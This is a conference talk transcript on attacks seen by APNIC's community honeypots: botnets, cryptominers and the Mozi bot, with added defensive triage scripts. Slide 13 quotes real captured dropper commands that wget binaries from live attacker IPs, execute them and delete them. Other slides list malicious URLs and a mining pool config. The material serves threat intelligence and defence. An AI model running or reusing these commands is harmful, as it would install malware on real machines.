APNIC Senior Internet Security Specialist Adli Wahid shares his insights on observations from the APNIC Community Honeynet Project at InfoSec Taiwan 2023, held in Taipei from 1 to 4 August 2023.
2. Hello
o Sr. Security Specialist @ APNIC since 2014
o Previously at Malaysia CERT, Bank of Tokyo Mitsubishi UFJ
o Let's Connect – Adli Wahid on LinkedIn
3. The Plan
1. APNIC Community Honeynet Project
2. Observations / Insights
3. Takeaways
4. Honeypots / Honeytokens
• Old Tech?
• Exposed systems / Tokens
• No production value
• Enterprise vs Research Honeypots
• Real value for defenders
o Detection
o Starting point for investigation
o IOCs
• But
o Coverage – not all types of attacks are seen
o Depends on how you set up the honeypots and on your knowledge of the attack
o Fingerprinting – honeypots can be identified by attackers
5. APNIC Community Honeynet Project
• APNIC – Regional Internet Registry for Asia Pacific Region
o IP address delegation, whois, RPKI
o Capacity Development
• APNIC Community Honeynet Project
• Initially used for awareness and training (2014)
• Since 2018 deployment with multiple sensors
• The Backend
• Open Source projects (Community Honey Network / CHN), Elastic Stack + scripts
• Mix of Telnet/SSH (Cowrie) and Dionaea
6. APNIC Community Honeynet Project (2)
• Data Shared / Used
o Internally: dash.apnic.net, where APNIC Members are notified if their IPs are seen in the honeypot logs
o Sharing with communities – ShadowServer Foundation, CERTs/CSIRTs, feeds for MISP
o Research and Analysis (need to do more here)
• We welcome partnerships in any form
8. In a nutshell
• No surprises, nothing really ‘sophisticated’
• Botnets, DDoS agents, miners
• Attackers build infrastructure for running attacks & campaigns
• Attackers leverage open vulnerabilities
• Easy to spot and see – but if you're not watching (or aware) you'll miss it
• Bigger picture – secure development, deployment and incident response. How can we stop or discourage the attacks?
13.
cd /tmp
wget -qc http://209.97.132.66/miner3.tgz
tar xf miner3.tgz
rm -rf miner3.tgz
cd .cache
chmod +x *
./x >.a
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/mips; chmod +x mips; ./mips; rm -rf mips
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/mipsel; chmod +x mipsel; ./mipsel; rm -rf mipsel
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/sh4; chmod +x sh4; ./sh4; rm -rf sh4
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/x86; chmod +x x86; ./x86; rm -rf x86
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/arm61; chmod +x arm61; ./arm61; rm -rf arm61
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/i686; chmod +x i686; ./i686; rm -rf i686
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/ppc; chmod +x ppc; ./ppc; rm -rf ppc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/586; chmod +x 586; ./586; rm -rf 586
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/m68k; chmod +x m68k; ./m68k; rm -rf m68k
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/dc; chmod +x dc; ./dc; rm -rf dc
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/dss; chmod +x dss; ./dss; rm -rf dss
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/co; chmod +x co; ./co; rm -rf co
cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://176.223.139.141/scar; chmod +x scar; ./scar; rm -rf scar
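The command lines above are the raw input a Cowrie sensor records; what a defender wants from them is the download/execute/cleanup chain and the hosting IPs as indicators. The following is an added example, not code from the talk or the APNIC project: a small triage routine that splits captured shell lines on `;`, `||` and `&&`, flags the "wget, chmod +x, run, rm" dropper chain, and counts hosting hosts. The sample lines are constructed in the shape of the captured commands, using the TEST-NET documentation range rather than the real IPs.

```python
import re
from collections import Counter

# Constructed sample in the shape of the captured multi-architecture dropper commands.
# 192.0.2.0/24 is the TEST-NET-1 documentation range, not a real hosting server.
SAMPLE_COMMANDS = [
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.0.2.10/mips; chmod +x mips; ./mips; rm -rf mips",
    "cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://192.0.2.10/arm61; chmod +x arm61; ./arm61; rm -rf arm61",
    "cd /tmp; wget -qc http://192.0.2.20/miner3.tgz; tar xf miner3.tgz; rm -rf miner3.tgz",
    "ls -la /tmp",
]

URL_RE = re.compile(r"https?://[^\s;|'\"]+")

def split_commands(line):
    """Split one shell line into simple commands on ';', '||' and '&&'."""
    return [c.strip() for c in re.split(r";|\|\||&&", line) if c.strip()]

def analyse_line(line):
    """Describe download/execute/cleanup behaviour found in one captured line."""
    cmds = split_commands(line)
    urls = URL_RE.findall(line)
    fetched = [u.rsplit("/", 1)[-1] for u in urls]          # file names pulled down
    executed = {c[2:].split()[0] for c in cmds if c.startswith("./")}
    removed = {c.split()[-1] for c in cmds if c.startswith("rm ")}
    chmod = {c.split()[-1] for c in cmds if c.startswith("chmod +x")}
    # Dropper chain: fetch a file, mark it executable, run it, then delete it.
    chain = any(f in executed and f in removed and f in chmod for f in fetched)
    return {
        "urls": urls,
        "artifacts": fetched,
        "dropper_chain": chain,
        "write_dirs": [c.split()[-1] for c in cmds if c.startswith("cd ")],
    }

def summarise(lines):
    """Aggregate hosting hosts and the number of dropper-chain lines across a capture."""
    hosts = Counter()
    droppers = 0
    for line in lines:
        r = analyse_line(line)
        for u in r["urls"]:
            hosts[u.split("/")[2]] += 1                     # host part of http://host/path
        droppers += r["dropper_chain"]
    return {"hosts": dict(hosts), "dropper_lines": droppers}
```

The `hosts` counter is the part worth feeding into sharing (MISP, ShadowServer) since the hosting server usually outlives the individual binary names.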
14. What is in the Config?
"pools": [
  {
    "algo": null,
    "coin": null,
    "url": "pool.hashvault.pro:80",
    "user": "49oZc6c6rB58TD6KmU2m5qGGbmdeknXgQHrU[redacted]TqrjpzwdTTnwhShnoWz4BbKAMfWLNApG6ARGoS",
    [redacted]
19. Changing Infrastructure
• DDoS Botnet (Tsunami**)
• Started with just 4 hosts in April 2021
• More than 12k IP addresses to date
• Evolution
• April 21 – Jan 22
o hxxp://71.127.148.69/.x/*.sh
• Jan 22 – Feb 22
o hxxp://202.110.187.205/.x/*.sh
• Feb 22 –
o hxxp://61.177.137.133/.x/*.sh
o Still active in 2023. 5-6 URLs (IP addresses)
20. Left-Over of Mozi (p2p botnet)?
https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/
22. Activities in Honeypots
• In 05/2022, we observed an ELF binary ".i" in some URLs
o Post-login downloads
• Pattern looks familiar
http://xxx.xxx.xxx.xxx:random_port/.i
• IP in URL can be the same as the attacking host or different
1. Telnet username:password
2. wget http://x.x.x.x:nnnn/.i
Columns: timestamp, source IP (attacking/spreading), URL on the IP hosting the binary:random_port, country, ASN
o 2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766
o 2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134
o 2022-05-26T03:46:12.338083,114.34.185.8,hxxp://114.34.185.8:11470/.i,TW,3462
o 2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724
o 2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224
o 2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764
o 2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134
o 2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273
23. The “.i” & Finding Mozi
o .i: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, stripped
• SHA256 a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3
o Known to VirusTotal
• Finding Mozi
• Maybe we can find Mozi.m or Mozi.a on the webserver?
o If .i in $IP:PORT
o Then download $IP:PORT/mozi.a || $IP:PORT/mozi.m || $IP:PORT/Mozi.m || $IP:PORT/Mozi.a || $IP:PORT/config
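The two slides above describe one triage rule: match the `http://IP:random_port/.i` download pattern in the honeypot records, note whether the hosting IP is the attacking IP, and derive the sibling paths (mozi.a, mozi.m, Mozi.m, Mozi.a, config) to check on the same IP:PORT. This added example (not the talk's or the APNIC project's code) implements that rule over records in the same comma-separated shape as the slide's list; the records, IPs and ASNs are constructed from documentation ranges, and the code only builds the candidate URLs rather than fetching anything.

```python
import re
from urllib.parse import urlsplit

# Constructed records in the slide's shape: timestamp,source_ip,download_url,country,asn
# (hxxp:// is the defanged form used on the slide). IPs are TEST-NET documentation
# addresses and ASNs are from the private/documentation range, not real observations.
SAMPLE_RECORDS = """\
2022-05-25T11:23:24.433026,192.0.2.5,hxxp://192.0.2.5:10035/.i,KR,64496
2022-05-26T06:51:04.319952,198.51.100.7,hxxp://203.0.113.9:23349/.i,IR,64497
2022-05-26T07:35:24.881174,192.0.2.8,hxxp://192.0.2.8/miner3.tgz,CN,64496
"""

# The pattern from slide 22: bare IPv4, a port, and the file name ".i" at the root.
DOT_I_RE = re.compile(r"^https?://(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})/\.i$")

def refang(url):
    """Turn the defanged hxxp:// form back into a parseable scheme."""
    return re.sub(r"^hxxp", "http", url, flags=re.IGNORECASE)

def parse_record(line):
    ts, src, url, cc, asn = line.split(",")
    return {"ts": ts, "src": src, "url": refang(url), "cc": cc, "asn": int(asn)}

def classify(rec):
    """Flag the '.i on IP:random_port' pattern and whether hosting IP == attacking IP."""
    m = DOT_I_RE.match(rec["url"])
    if not m:
        return {"pattern": False}
    host, port = m.group(1), int(m.group(2))
    return {"pattern": True, "host": host, "port": port, "same_host": host == rec["src"]}

def mozi_candidates(url):
    """Sibling paths slide 23 suggests checking on the same IP:PORT once '.i' is seen."""
    parts = urlsplit(url)
    base = f"{parts.scheme}://{parts.netloc}"
    return [f"{base}/{name}" for name in ("mozi.a", "mozi.m", "Mozi.m", "Mozi.a", "config")]

def triage(text):
    """Return only the records matching the pattern, enriched with the candidate paths."""
    hits = []
    for line in text.splitlines():
        rec = parse_record(line)
        c = classify(rec)
        if c["pattern"]:
            hits.append({**rec, **c, "candidates": mozi_candidates(rec["url"])})
    return hits
```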
25. Mozi (story) Recap
• A known threat
• Still propagating: 58k unique IP addresses observed since last year
• Basic practice of device security management* can help prevent infection but …
26. Takeaways
1. Honeypots have value
o Simplest form of detection or awareness, but allows going in depth
o Understanding attackers' infrastructure (left of the hack)
o Priorities: Ransomware vs DDoS agent vs Cryptominers
o Priorities: Windows vs Linux/Unix
2. Incident Response
o Sharing is not equal to fixing
o Prevention is great, but what about the actors?
o Capabilities and appetite of relevant entities (CERTs/CSIRTs, LEAs)
3. Implication of No Action
o Security implementation is not holistic
o Cyber criminals: access brokers, problem getting bigger (DDoS), profitability